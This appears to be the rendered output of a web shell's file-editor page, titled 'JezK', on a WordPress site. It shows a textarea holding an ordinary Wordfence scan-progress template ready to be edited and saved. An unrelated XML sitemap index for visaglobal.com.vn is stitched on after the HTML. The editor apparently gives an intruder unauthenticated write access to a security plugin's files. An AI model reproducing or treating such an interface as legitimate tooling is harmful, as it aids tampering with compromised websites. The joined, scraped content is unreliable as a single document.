
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: scan-progress-element.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
if (!defined('WORDFENCE_VERSION')) { exit; }
/**
 * Presents an individual element in the scan progress indicator.
 *
 * Expects $id, $title, and $scanner. $premiumOnly and $status may also be defined.
 *
 * @var string $id The element ID.
 * @var string $title The element title.
 * @var wfScanner $scanner The scanner state.
 * @var string $status One of the wfScanner::STATUS_ constants.
 */

if (!isset($premiumOnly)) { $premiumOnly = false; }

$class = '';
switch ($status) {
	case wfScanner::STATUS_PENDING:
		//No class
		break;
	case wfScanner::STATUS_RUNNING:
	case wfScanner::STATUS_RUNNING_WARNING:
		$class = 'wf-scan-step-running';
		break;
	case wfScanner::STATUS_COMPLETE_SUCCESS:
		$class = 'wf-scan-step-complete-success';
		break;
	case wfScanner::STATUS_COMPLETE_WARNING:
		$class = 'wf-scan-step-complete-warning';
		break;
	case wfScanner::STATUS_PREMIUM:
		$class = 'wf-scan-step-premium';
		break;
	case wfScanner::STATUS_DISABLED:
		$class = 'wf-scan-step-disabled';
		break;
}

?&gt;
&lt;li id=&quot;&lt;?php echo esc_attr($id); ?&gt;&quot; class=&quot;wf-scan-step&lt;?php if ($class) { echo &quot; {$class}&quot;; } ?&gt;&quot;&gt;
	&lt;div class=&quot;wf-scan-step-icon&quot;&gt;
		&lt;?php if ($status == wfScanner::STATUS_PREMIUM): ?&gt;
			&lt;div class=&quot;wf-scan-step-premium&quot;&gt;&lt;/div&gt;
		&lt;?php endif; ?&gt;
		&lt;div class=&quot;wf-scan-step-pending&quot;&gt;&lt;/div&gt;
		&lt;div class=&quot;wf-scan-step-running&quot;&gt;
			&lt;?php
			echo wfView::create('common/indeterminate-progress', array(
				'size' =&gt; 50,
			))-&gt;render();
			?&gt;
		&lt;/div&gt;
		&lt;div class=&quot;wf-scan-step-complete-success&quot;&gt;&lt;/div&gt;
		&lt;div class=&quot;wf-scan-step-complete-warning&quot;&gt;&lt;/div&gt;
		&lt;div class=&quot;wf-scan-step-disabled&quot;&gt;&lt;/div&gt;
	&lt;/div&gt;
	&lt;div class=&quot;wf-scan-step-title&quot;&gt;&lt;?php echo esc_html($title); ?&gt;&lt;/div&gt;
	&lt;?php if ($status == wfScanner::STATUS_PREMIUM): ?&gt;
		&lt;div class=&quot;wf-scan-step-subtitle&quot;&gt;&lt;a href=&quot;https://www.wordfence.com/gnl1scanUpgrade/wordfence-signup/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;&lt;?php esc_html_e('Upgrade', 'wordfence'); ?&gt;&lt;span class=&quot;screen-reader-text&quot;&gt; (&lt;?php esc_html_e('opens in new tab', 'wordfence') ?&gt;)&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
	&lt;?php endif; ?&gt;
&lt;/li&gt;</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//visaglobal.com.vn/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap1.xml</loc>
		<lastmod>2026-08-28T06:51:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap2.xml</loc>
		<lastmod>2026-08-27T04:35:16+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap3.xml</loc>
		<lastmod>2026-08-27T04:24:40+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/page-sitemap.xml</loc>
		<lastmod>2026-08-26T09:38:50+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/category-sitemap.xml</loc>
		<lastmod>2026-08-28T06:51:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/video-sitemap.xml</loc>
		<lastmod>2026-08-26T09:38:50+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->